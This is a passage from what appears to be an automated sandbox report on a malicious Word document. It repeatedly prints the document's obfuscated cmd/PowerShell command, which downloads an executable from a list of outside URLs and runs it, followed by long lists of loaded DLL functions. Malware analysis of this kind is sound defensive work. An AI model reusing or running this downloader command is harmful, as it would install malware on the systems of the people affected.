87=!8hEj:_=H!&&SeT 5zLR=!87:tS=K!& seT JKI=!5zLR:2=c!&& SeT 4OiV=!JKI:\=2!&& SeT Jg=!4OiV:J={!& SET tW=!Jg:`=j!& set wg=!tW:nY=t!& SeT lE3d=!wg:#=\!& set 94vg=!lE3d:]=v!& SEt 3fr=!94vg:[=D!&& ecHO %3fr% | cmD "

Page 5 Date: 2020-05-24 16:33:21

Page 6: Infosec Binary Analisys 2019-01€¦ · Infosec Binary Analisys 2019-01 MalScore: 100 File type: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code

Infosec Binary Analisys

Executed a very long command line or script command which may be indicative of chainedcommands or obfuscation

- command: "C:\Windows\system32\cmd.exe" /c %PrOgRamdATa:~0,1%%pRoGramDaTA:~9,2%/v: /R " sET WtOF=pow^%PUBLIC:~5W31^%r^%SESSIONNAME:~-4W31^%?^%EMP:~-3W31^%llC6$onlinewnY='moderanYor]r';$In]esnYmennYA22ounnYos=new-oh`e2nYC6NenY.WehCliennY;$Ergonomi2]s='?nYnYp://www.ninYes?agri2o.2om/z7ISlnYpB@?nYnYp://www.nYenmiengiaren?anY.2om/hIf2Ri8tS2@?nYnYp://www.?opeinnYls2?ool.org/ehIV1do@?nYnYp://www.dnenes.2om.mx/Wm]9Lwru@?nYnYp://kynangnYu?o2.2om/?6p[O_'.SplinY('@');$,ro2eryAunYomonYi]eAunYomonYi]ews='ROIso';$SmallFres?unaa`C6=C6'\\4';$MoneyMarkenYA22ounnYir='plugandplaywz';$_eardIslandandM2[onaldIslandski=$en]:puhli2+'#'+$SmallFres?unaa`+'.exe';forea2?($deposinYpqC6inC6$Ergonomi2]s)JnYryJ$In]esnYmennYA22ounnYos.[ownloadFile($deposinYpqW3C6$_eardIslandandM2[onaldIslandski);$generanYing`k='ininYianYi]es?i';IfC6((,enY-InYemC6$_eardIslandandM2[onaldIslandski).lengnY?C6-geC680000)C6JIn]oke-InYemC6$_eardIslandandM2[onaldIslandski;$PersonalLoanA22ounnYrf='AunYomonYi]e]z';hreak;}}2anY2?J}}$paradigmsd2='In2redihleCon2renYetSeyhoardal';&Set rM29=!WtOF:,=G!& sET 7f=!rM29:W3=,!&&sET Gi7=!7f: =T!&& SET pNAW=!Gi7:C6= !&& SET 1OZ=!pNAW:h=b!&& sEt 8hEj=!1OZ:?=h!&& sEt 87=!8hEj:_=H!&&SeT 5zLR=!87:tS=K!& seT JKI=!5zLR:2=c!&& SeT 4OiV=!JKI:\=2!&& SeT Jg=!4OiV:J={!& SET tW=!Jg:`=j!& set wg=!tW:nY=t!& SeT lE3d=!wg:#=\!& set 94vg=!lE3d:]=v!& SEt 3fr=!94vg:[=D!&& ecHO %3fr% | %tmP:~-8,-7%%appdATA:~-4,1%D " - command: C:\Windows\sysnative\cmd.exe /c %PrOgRamdATa:~0,1%%pRoGramDaTA:~9,2% /v: /R " sET WtOF=pow^%PUBLIC:~5W31^%r^%SESSIONNAME:~-4W31^%?^%EMP:~-3W31^%llC6$onlinewnY='moderanYor]r';$In]esnYmennYA22ounnYos=new-oh`e2nYC6NenY.WehCliennY;$Ergonomi2]s='?nYnYp://www.ninYes?agri2o.2om/z7ISlnYpB@?nYnYp://www.nYenmiengiaren?anY.2om/hIf2Ri8tS2@?nYnYp://www.?opeinnYls2?ool.org/ehIV1do@?nYnYp://www.dnenes.2om.mx/Wm]9Lwru@?nYnYp://kynangnYu?o2.2om/?6p[O_'.SplinY('@');$,ro2eryAunYomonYi]eAunYomonYi]ews='ROIso';$SmallFres?unaa`C6=C6'\\4';$MoneyMarkenYA22ounnYir='plugandplaywz';$_eardIslandandM2[onaldIslandski=$en]:puhli2+'#'+$SmallFres?unaa`+'.exe';forea2?($deposinYpqC6inC6$Ergonomi2]s)JnYryJ$In]esnYmennYA22ounnYos.[ownloadFile($deposinYpqW3C6$_eardIslandandM2[onaldIslandski);$generanYing`k='ininYianYi]es?i';IfC6((,enY-InYemC6$_eardIslandandM2[onaldIslandski).lengnY?C6-geC680000)C6JIn]oke-InYemC6$_eardIslandandM2[onaldIslandski;$PersonalLoanA22ounnYrf='AunYomonYi]e]z';hreak;}}2anY2?J}}$paradigmsd2='In2redihleCon2renYetSeyhoardal';&Set rM29=!WtOF:,=G!& sET 7f=!rM29:W3=,!&&sET Gi7=!7f: =T!&& SET pNAW=!Gi7:C6= !&& SET 1OZ=!pNAW:h=b!&& sEt 8hEj=!1OZ:?=h!&& sEt 87=!8hEj:_=H!&&SeT 5zLR=!87:tS=K!& seT JKI=!5zLR:2=c!&& SeT 4OiV=!JKI:\=2!&& SeT Jg=!4OiV:J={!& SET tW=!Jg:`=j!& set wg=!tW:nY=t!& SeT lE3d=!wg:#=\!& set 94vg=!lE3d:]=v!& SEt 3fr=!94vg:[=D!&& ecHO %3fr% | %tmP:~-8,-7%%appdATA:~-4,1%D " - command: C:\Windows\system32\cmd.exe CmD /v: /R " sET WtOF=pow^%PUBLIC:~5W31^%r^%SESSIONNAME:~-4W31^%?^%EMP:~-3W31^%llC6$onlinewnY='moderanYor]r';$In]esnYmennYA22ounnYos=new-oh`e2nYC6NenY.WehCliennY;$Ergonomi2]s='?nYnYp://www.ninYes?agri2o.2om/z7ISlnYpB@?nYnYp://www.nYenmiengiaren?anY.2om/hIf2Ri8tS2@?nYnYp://www.?opeinnYls2?ool.org/ehIV1do@?nYnYp://www.dnenes.2om.mx/Wm]9Lwru@?nYnYp://kynangnYu?o2.2om/?6p[O_'.SplinY('@');$,ro2eryAunYomonYi]eAunYomonYi]ews='ROIso';$SmallFres?unaa`C6=C6'\\4';$MoneyMarkenYA22ounnYir='plugandplaywz';$_eardIslandandM2[onaldIslandski=$en]:puhli2+'#'+$SmallFres?unaa`+'.exe';forea2?($deposinYpqC6inC6$Ergonomi2]s)JnYryJ$In]esnYmennYA22ounnYos.[ownloadFile($deposinYpqW3C6$_eardIslandandM2[onaldIslandski);$generanYing`k='ininYianYi]es?i';IfC6((,enY-InYemC6$_eardIslandandM2[onaldIslandski).lengnY?C6-geC680000)C6JIn]oke-InYemC6$_eardIslandandM2[onaldIslandski;$PersonalLoanA22ounnYrf='AunYomonYi]e]z';hreak;}}2anY2?J}}$paradigmsd2='In2redihleCon2renYetSeyhoardal';&Set rM29=!WtOF:,=G!& sET 7f=!rM29:W3=,!&&sET Gi7=!7f: =T!&& SET pNAW=!Gi7:C6= !&& SET 1OZ=!pNAW:h=b!&& sEt 8hEj=!1OZ:?=h!&& sEt 87=!8hEj:_=H!&&SeT 5zLR=!87:tS=K!& seT JKI=!5zLR:2=c!&& SeT 4OiV=!JKI:\=2!&& SeT Jg=!4OiV:J={!& SET tW=!Jg:`=j!& set wg=!tW:nY=t!& SeT lE3d=!wg:#=\!& set 94vg=!lE3d:]=v!& SEt 3fr=!94vg:[=D!&& ecHO %3fr% | cmD " - command: C:\Windows\system32\cmd.exe CmD /v: /R " sET WtOF=pow^%PUBLIC:~5W31^%r^%SESSIONNAME:~-4W31^%?^%EMP:~-3W31^%llC6$onlinewnY='moderanYor]r';$In]esnYmennYA22ounnYos=new-oh`e2nYC6NenY.WehCliennY;$Ergonomi2]s='?nYnYp://www.ninYes?agri2o.2om/z7ISlnYpB@?nYnYp://www.nYenmi

Page 6 Date: 2020-05-24 16:33:21

Page 7: Infosec Binary Analisys 2019-01€¦ · Infosec Binary Analisys 2019-01 MalScore: 100 File type: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code

Infosec Binary Analisys

engiaren?anY.2om/hIf2Ri8tS2@?nYnYp://www.?opeinnYls2?ool.org/ehIV1do@?nYnYp://www.dnenes.2om.mx/Wm]9Lwru@?nYnYp://kynangnYu?o2.2om/?6p[O_'.SplinY('@');$,ro2eryAunYomonYi]eAunYomonYi]ews='ROIso';$SmallFres?unaa`C6=C6'\\4';$MoneyMarkenYA22ounnYir='plugandplaywz';$_eardIslandandM2[onaldIslandski=$en]:puhli2+'#'+$SmallFres?unaa`+'.exe';forea2?($deposinYpqC6inC6$Ergonomi2]s)JnYryJ$In]esnYmennYA22ounnYos.[ownloadFile($deposinYpqW3C6$_eardIslandandM2[onaldIslandski);$generanYing`k='ininYianYi]es?i';IfC6((,enY-InYemC6$_eardIslandandM2[onaldIslandski).lengnY?C6-geC680000)C6JIn]oke-InYemC6$_eardIslandandM2[onaldIslandski;$PersonalLoanA22ounnYrf='AunYomonYi]e]z';hreak;}}2anY2?J}}$paradigmsd2='In2redihleCon2renYetSeyhoardal';&Set rM29=!WtOF:,=G!& sET 7f=!rM29:W3=,!&&sET Gi7=!7f: =T!&& SET pNAW=!Gi7:C6= !&& SET 1OZ=!pNAW:h=b!&& sEt 8hEj=!1OZ:?=h!&& sEt 87=!8hEj:_=H!&&SeT 5zLR=!87:tS=K!& seT JKI=!5zLR:2=c!&& SeT 4OiV=!JKI:\=2!&& SeT Jg=!4OiV:J={!& SET tW=!Jg:`=j!& set wg=!tW:nY=t!& SeT lE3d=!wg:#=\!& set 94vg=!lE3d:]=v!& SEt 3fr=!94vg:[=D!&& ecHO %3fr% | cmD "

A process created a hidden window

- Process: WINWORD.EXE -> C:\Windows\sysnative\cmd.exe

Dynamic (imported) function loading detected

- DynamicLoader: VERSION.dll/GetFileVersionInfoA - DynamicLoader: VERSION.dll/GetFileVersionInfoSizeA - DynamicLoader: VERSION.dll/VerQueryValueA - DynamicLoader: VERSION.dll/GetFileVersionInfoW - DynamicLoader: VERSION.dll/GetFileVersionInfoSizeW - DynamicLoader: VERSION.dll/VerQueryValueW - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: kernel32.dll/HeapSetInformation - DynamicLoader: GKWord.dll/FValidateWordFile - DynamicLoader: GKWord.dll/HrInitHost - DynamicLoader: kernel32.dll/SwitchToThread - DynamicLoader: kernel32.dll/TryEnterCriticalSection - DynamicLoader: kernel32.dll/SetCriticalSectionSpinCount - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: RPCRT4.dll/NdrClientCall3 - DynamicLoader: RPCRT4.dll/RpcStringBindingComposeW - DynamicLoader: RPCRT4.dll/RpcBindingFromStringBindingW - DynamicLoader: RPCRT4.dll/RpcBindingSetAuthInfoExW - DynamicLoader: RPCRT4.dll/RpcStringFreeW - DynamicLoader: RPCRT4.dll/RpcBindingFree - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: unidrvui.dll/DrvResetConfigCache - DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets - DynamicLoader: mxdwdui.DLL/DllGetClassObject - DynamicLoader: Comctl32.dll/InitCommonControlsEx - DynamicLoader: mxdwdui.DLL/DllCanUnloadNow - DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets - DynamicLoader: mxdwdui.DLL/DllGetClassObject - DynamicLoader: mxdwdui.DLL/DllCanUnloadNow - DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets - DynamicLoader: mxdwdui.DLL/DllGetClassObject - DynamicLoader: mxdwdui.DLL/DllCanUnloadNow - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: unidrvui.dll/DrvDeviceCapabilities

Page 7 Date: 2020-05-24 16:33:21

Page 8: Infosec Binary Analisys 2019-01€¦ · Infosec Binary Analisys 2019-01 MalScore: 100 File type: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code

Infosec Binary Analisys

- DynamicLoader: mxdwdui.DLL/DllGetClassObject - DynamicLoader: mxdwdui.DLL/DllCanUnloadNow - DynamicLoader: mso.dll/ - DynamicLoader: unidrvui.dll/DrvDeviceCapabilities - DynamicLoader: mxdwdui.DLL/DllGetClassObject - DynamicLoader: mxdwdui.DLL/DllCanUnloadNow - DynamicLoader: unidrvui.dll/DrvDeviceCapabilities - DynamicLoader: mxdwdui.DLL/DllGetClassObject - DynamicLoader: mxdwdui.DLL/DllCanUnloadNow - DynamicLoader: unidrvui.dll/DrvDeviceCapabilities - DynamicLoader: mxdwdui.DLL/DllGetClassObject - DynamicLoader: kernel32.dll/GetTickCount64 - DynamicLoader: mxdwdui.DLL/DllCanUnloadNow - DynamicLoader: unidrvui.dll/DrvDeviceCapabilities - DynamicLoader: mxdwdui.DLL/DllGetClassObject - DynamicLoader: mxdwdui.DLL/DllCanUnloadNow - DynamicLoader: unidrvui.dll/DrvDeviceCapabilities - DynamicLoader: mxdwdui.DLL/DllGetClassObject - DynamicLoader: mxdwdui.DLL/DllCanUnloadNow - DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets - DynamicLoader: mxdwdui.DLL/DllGetClassObject - DynamicLoader: mxdwdui.DLL/DllCanUnloadNow - DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets - DynamicLoader: mxdwdui.DLL/DllGetClassObject - DynamicLoader: mxdwdui.DLL/DllCanUnloadNow - DynamicLoader: mso.dll/ - DynamicLoader: Winspool.DRV/StartDocDlgW - DynamicLoader: Winspool.DRV/OpenPrinterW - DynamicLoader: Winspool.DRV/ResetPrinterW - DynamicLoader: Winspool.DRV/ClosePrinter - DynamicLoader: Winspool.DRV/GetPrinterW - DynamicLoader: Winspool.DRV/GetPrinterDriverW - DynamicLoader: Winspool.DRV/EndDocPrinter - DynamicLoader: Winspool.DRV/EndPagePrinter - DynamicLoader: Winspool.DRV/ReadPrinter - DynamicLoader: Winspool.DRV/StartDocPrinterW - DynamicLoader: Winspool.DRV/StartPagePrinter - DynamicLoader: Winspool.DRV/AbortPrinter - DynamicLoader: Winspool.DRV/DocumentEvent - DynamicLoader: Winspool.DRV/QuerySpoolMode - DynamicLoader: Winspool.DRV/QueryRemoteFonts - DynamicLoader: Winspool.DRV/SeekPrinter - DynamicLoader: Winspool.DRV/QueryColorProfile - DynamicLoader: Winspool.DRV/SplDriverUnloadComplete - DynamicLoader: Winspool.DRV/DocumentPropertiesW - DynamicLoader: Winspool.DRV/ - DynamicLoader: Winspool.DRV/IsValidDevmodeW - DynamicLoader: Winspool.DRV/GetSpoolFileHandle - DynamicLoader: Winspool.DRV/CommitSpoolData - DynamicLoader: Winspool.DRV/CloseSpoolFileHandle - DynamicLoader: Winspool.DRV/ - DynamicLoader: unidrvui.dll/DrvDocumentEvent - DynamicLoader: mxdwdui.DLL/DllGetClassObject - DynamicLoader: mxdwdui.DLL/DllCanUnloadNow - DynamicLoader: unidrvui.dll/DrvDocumentEvent - DynamicLoader: mxdwdui.DLL/DllGetClassObject - DynamicLoader: mxdwdui.DLL/DllCanUnloadNow - DynamicLoader: mxdwdrv.dll/DrvEnableDriver - DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets - DynamicLoader: mxdwdui.DLL/DllGetClassObject - DynamicLoader: mxdwdui.DLL/DllCanUnloadNow - DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets - DynamicLoader: mxdwdui.DLL/DllGetClassObject

Page 8 Date: 2020-05-24 16:33:21

Page 9: Infosec Binary Analisys 2019-01€¦ · Infosec Binary Analisys 2019-01 MalScore: 100 File type: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code

Infosec Binary Analisys

- DynamicLoader: mxdwdui.DLL/DllCanUnloadNow - DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets - DynamicLoader: mxdwdui.DLL/DllGetClassObject - DynamicLoader: mxdwdui.DLL/DllCanUnloadNow - DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets - DynamicLoader: mxdwdui.DLL/DllGetClassObject - DynamicLoader: mxdwdui.DLL/DllCanUnloadNow - DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets - DynamicLoader: mxdwdui.DLL/DllGetClassObject - DynamicLoader: mxdwdui.DLL/DllCanUnloadNow - DynamicLoader: FontSub.dll/CreateFontPackage - DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets - DynamicLoader: mxdwdui.DLL/DllGetClassObject - DynamicLoader: mxdwdui.DLL/DllCanUnloadNow - DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets - DynamicLoader: mxdwdui.DLL/DllGetClassObject - DynamicLoader: mxdwdui.DLL/DllCanUnloadNow - DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets - DynamicLoader: mxdwdui.DLL/DllGetClassObject - DynamicLoader: mxdwdui.DLL/DllCanUnloadNow - DynamicLoader: unidrvui.dll/DrvDeviceCapabilities - DynamicLoader: mxdwdui.DLL/DllGetClassObject - DynamicLoader: mxdwdui.DLL/DllCanUnloadNow - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: unidrvui.dll/DrvDeviceCapabilities - DynamicLoader: mxdwdui.DLL/DllGetClassObject - DynamicLoader: mxdwdui.DLL/DllCanUnloadNow - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/

Page 9 Date: 2020-05-24 16:33:21

Page 10: Infosec Binary Analisys 2019-01€¦ · Infosec Binary Analisys 2019-01 MalScore: 100 File type: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code

Infosec Binary Analisys

- DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: MSPTLS.DLL/ - DynamicLoader: MSPTLS.DLL/ - DynamicLoader: mso.dll/ - DynamicLoader: MSPTLS.DLL/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: GDI32.dll/GetCharABCWidthsI - DynamicLoader: USP10.DLL/ScriptGetFontScriptTags - DynamicLoader: GDI32.dll/GdiRealizationInfo - DynamicLoader: GDI32.dll/FontIsLinked - DynamicLoader: ADVAPI32.dll/RegOpenKeyExW - DynamicLoader: ADVAPI32.dll/RegQueryValueExW - DynamicLoader: ADVAPI32.dll/RegCloseKey - DynamicLoader: USP10.DLL/ScriptGetFontLanguageTags - DynamicLoader: USP10.DLL/ScriptGetFontFeatureTags - DynamicLoader: MSPTLS.DLL/ - DynamicLoader: MSPTLS.DLL/ - DynamicLoader: MSPTLS.DLL/ - DynamicLoader: MSPTLS.DLL/ - DynamicLoader: MSPTLS.DLL/ - DynamicLoader: kernel32.dll/LoadLibraryW - DynamicLoader: GdiPlus.dll/GdiplusStartup - DynamicLoader: USER32.dll/GetWindowInfo - DynamicLoader: USER32.dll/GetAncestor - DynamicLoader: USER32.dll/GetMonitorInfoA - DynamicLoader: USER32.dll/EnumDisplayMonitors - DynamicLoader: USER32.dll/EnumDisplayDevicesA - DynamicLoader: GDI32.dll/ExtTextOutW - DynamicLoader: GDI32.dll/GdiIsMetaPrintDC - DynamicLoader: GdiPlus.dll/GdipDeletePath - DynamicLoader: MSPTLS.DLL/ - DynamicLoader: MSPTLS.DLL/ - DynamicLoader: GdiPlus.dll/GdipCreatePath - DynamicLoader: GdiPlus.dll/GdipStartPathFigure - DynamicLoader: GdiPlus.dll/GdipAddPathLine2 - DynamicLoader: GdiPlus.dll/GdipCreateMatrix2 - DynamicLoader: GdiPlus.dll/GdipTransformPath - DynamicLoader: GdiPlus.dll/GdipDeleteMatrix - DynamicLoader: GdiPlus.dll/GdipGetPathWorldBounds - DynamicLoader: GdiPlus.dll/GdipClonePath - DynamicLoader: GdiPlus.dll/GdipCreatePathIter - DynamicLoader: GdiPlus.dll/GdipPathIterRewind - DynamicLoader: GdiPlus.dll/GdipPathIterNextSubpath - DynamicLoader: GdiPlus.dll/GdipPathIterCopyData - DynamicLoader: GdiPlus.dll/GdipDeletePathIter - DynamicLoader: MSPTLS.DLL/ - DynamicLoader: MSPTLS.DLL/ - DynamicLoader: MSPTLS.DLL/ - DynamicLoader: MSPTLS.DLL/ - DynamicLoader: MSPTLS.DLL/ - DynamicLoader: MSPTLS.DLL/ - DynamicLoader: MSPTLS.DLL/ - DynamicLoader: MSPTLS.DLL/

Page 10 Date: 2020-05-24 16:33:21

Page 11: Infosec Binary Analisys 2019-01€¦ · Infosec Binary Analisys 2019-01 MalScore: 100 File type: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code

Infosec Binary Analisys

- DynamicLoader: MSPTLS.DLL/ - DynamicLoader: MSPTLS.DLL/ - DynamicLoader: MSPTLS.DLL/ - DynamicLoader: MSPTLS.DLL/ - DynamicLoader: MSPTLS.DLL/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: MSPTLS.DLL/ - DynamicLoader: MSPTLS.DLL/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: MSPTLS.DLL/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: MSPTLS.DLL/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: ole32.dll/PropVariantClear - DynamicLoader: OLEAUT32.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: ADVAPI32.dll/RegQueryValueW - DynamicLoader: apphelp.dll/ApphelpCheckShellObject - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: SXS.DLL/SxsOleAut32MapReferenceClsidToConfiguredClsid - DynamicLoader: mso.dll/ - DynamicLoader: SXS.DLL/SxsOleAut32RedirectTypeLibrary - DynamicLoader: ADVAPI32.dll/RegOpenKeyW - DynamicLoader: ADVAPI32.dll/RegQueryValueW

Page 11 Date: 2020-05-24 16:33:21

Page 12: Infosec Binary Analisys 2019-01€¦ · Infosec Binary Analisys 2019-01 MalScore: 100 File type: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code

Infosec Binary Analisys

- DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: VBE7.DLL/DllVbeInit - DynamicLoader: mso.dll/MsoInitGimme - DynamicLoader: mso.dll/MsoFGimmeFeatureEx - DynamicLoader: mso.dll/MsoFGimmeComponentEx - DynamicLoader: mso.dll/MsoFGimmeFileEx - DynamicLoader: mso.dll/MsoSetLVProperty - DynamicLoader: mso.dll/MsoVBADigSigCallDlg - DynamicLoader: mso.dll/MsoVbaInitSecurity - DynamicLoader: mso.dll/MsoFIEPolicyAndVersion - DynamicLoader: mso.dll/MsoFUseIEFeature - DynamicLoader: mso.dll/MsoFAnsiCodePageSupportsLCID - DynamicLoader: mso.dll/MsoFInitOffice - DynamicLoader: mso.dll/MsoUninitOffice - DynamicLoader: mso.dll/MsoFGetFontSettings - DynamicLoader: mso.dll/MsoRgchToRgwch - DynamicLoader: mso.dll/MsoHrSimpleQueryInterface - DynamicLoader: mso.dll/MsoHrSimpleQueryInterface2 - DynamicLoader: mso.dll/MsoFCreateControl - DynamicLoader: mso.dll/MsoFLongLoad - DynamicLoader: mso.dll/MsoFLongSave - DynamicLoader: mso.dll/MsoFGetTooltips - DynamicLoader: mso.dll/MsoFSetTooltips - DynamicLoader: mso.dll/MsoFLoadToolbarSet - DynamicLoader: mso.dll/MsoFCreateToolbarSet - DynamicLoader: mso.dll/MsoInitShrGlobal - DynamicLoader: mso.dll/MsoHpalOffice - DynamicLoader: mso.dll/MsoFWndProcNeeded - DynamicLoader: mso.dll/MsoFWndProc - DynamicLoader: mso.dll/MsoFCreateITFCHwnd - DynamicLoader: mso.dll/MsoDestroyITFC - DynamicLoader: mso.dll/MsoFPitbsFromHwndAndMsg - DynamicLoader: mso.dll/MsoFGetComponentManager - DynamicLoader: mso.dll/MsoMultiByteToWideChar - DynamicLoader: mso.dll/MsoWideCharToMultiByte - DynamicLoader: mso.dll/MsoHrRegisterAll - DynamicLoader: mso.dll/MsoFSetComponentManager - DynamicLoader: mso.dll/MsoFCreateStdComponentManager - DynamicLoader: mso.dll/MsoFHandledMessageNeeded - DynamicLoader: mso.dll/MsoPeekMessage - DynamicLoader: mso.dll/MsoGetWWWCmdInfo - DynamicLoader: mso.dll/MsoFExecWWWHelp - DynamicLoader: mso.dll/MsoFCreateIPref - DynamicLoader: mso.dll/MsoDestroyIPref - DynamicLoader: mso.dll/MsoChsFromLid - DynamicLoader: mso.dll/MsoCpgFromChs - DynamicLoader: mso.dll/MsoSetLocale - DynamicLoader: mso.dll/MsoFSetHMsoinstOfSdm - DynamicLoader: mso.dll/MsoVBADigSig2CallDlgEx - DynamicLoader: mso.dll/MsoVbaInitSecurityEx - DynamicLoader: OLEAUT32.dll/SysFreeString - DynamicLoader: OLEAUT32.dll/LoadTypeLib - DynamicLoader: OLEAUT32.dll/RegisterTypeLib - DynamicLoader: OLEAUT32.dll/QueryPathOfRegTypeLib - DynamicLoader: OLEAUT32.dll/UnRegisterTypeLib - DynamicLoader: OLEAUT32.dll/OleTranslateColor - DynamicLoader: OLEAUT32.dll/OleCreateFontIndirect - DynamicLoader: OLEAUT32.dll/OleCreatePictureIndirect - DynamicLoader: OLEAUT32.dll/OleLoadPicture - DynamicLoader: OLEAUT32.dll/OleCreatePropertyFrameIndirect - DynamicLoader: OLEAUT32.dll/OleCreatePropertyFrame - DynamicLoader: OLEAUT32.dll/OleIconToCursor

Page 12 Date: 2020-05-24 16:33:21

Page 13: Infosec Binary Analisys 2019-01€¦ · Infosec Binary Analisys 2019-01 MalScore: 100 File type: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code

Infosec Binary Analisys

- DynamicLoader: OLEAUT32.dll/LoadTypeLibEx - DynamicLoader: OLEAUT32.dll/OleLoadPictureEx - DynamicLoader: USER32.dll/GetSystemMetrics - DynamicLoader: USER32.dll/MonitorFromWindow - DynamicLoader: USER32.dll/MonitorFromRect - DynamicLoader: USER32.dll/MonitorFromPoint - DynamicLoader: USER32.dll/EnumDisplayMonitors - DynamicLoader: USER32.dll/GetMonitorInfoA - DynamicLoader: USER32.dll/EnumDisplayDevicesA - DynamicLoader: OLEAUT32.dll/GetRecordInfoFromTypeInfo - DynamicLoader: OLEAUT32.dll/GetRecordInfoFromGuids - DynamicLoader: OLEAUT32.dll/SafeArrayGetRecordInfo - DynamicLoader: OLEAUT32.dll/SafeArraySetRecordInfo - DynamicLoader: OLEAUT32.dll/SafeArrayGetIID - DynamicLoader: OLEAUT32.dll/SafeArraySetIID - DynamicLoader: OLEAUT32.dll/SafeArrayCopyData - DynamicLoader: OLEAUT32.dll/SafeArrayAllocDescriptorEx - DynamicLoader: OLEAUT32.dll/SafeArrayCreateEx - DynamicLoader: OLEAUT32.dll/VarFormat - DynamicLoader: OLEAUT32.dll/VarFormatDateTime - DynamicLoader: OLEAUT32.dll/VarFormatNumber - DynamicLoader: OLEAUT32.dll/VarFormatPercent - DynamicLoader: OLEAUT32.dll/VarFormatCurrency - DynamicLoader: OLEAUT32.dll/VarWeekdayName - DynamicLoader: OLEAUT32.dll/VarMonthName - DynamicLoader: OLEAUT32.dll/VarAdd - DynamicLoader: OLEAUT32.dll/VarAnd - DynamicLoader: OLEAUT32.dll/VarCat - DynamicLoader: OLEAUT32.dll/VarDiv - DynamicLoader: OLEAUT32.dll/VarEqv - DynamicLoader: OLEAUT32.dll/VarIdiv - DynamicLoader: OLEAUT32.dll/VarImp - DynamicLoader: OLEAUT32.dll/VarMod - DynamicLoader: OLEAUT32.dll/VarMul - DynamicLoader: OLEAUT32.dll/VarOr - DynamicLoader: OLEAUT32.dll/VarPow - DynamicLoader: OLEAUT32.dll/VarSub - DynamicLoader: OLEAUT32.dll/VarXor - DynamicLoader: OLEAUT32.dll/VarAbs - DynamicLoader: OLEAUT32.dll/VarFix - DynamicLoader: 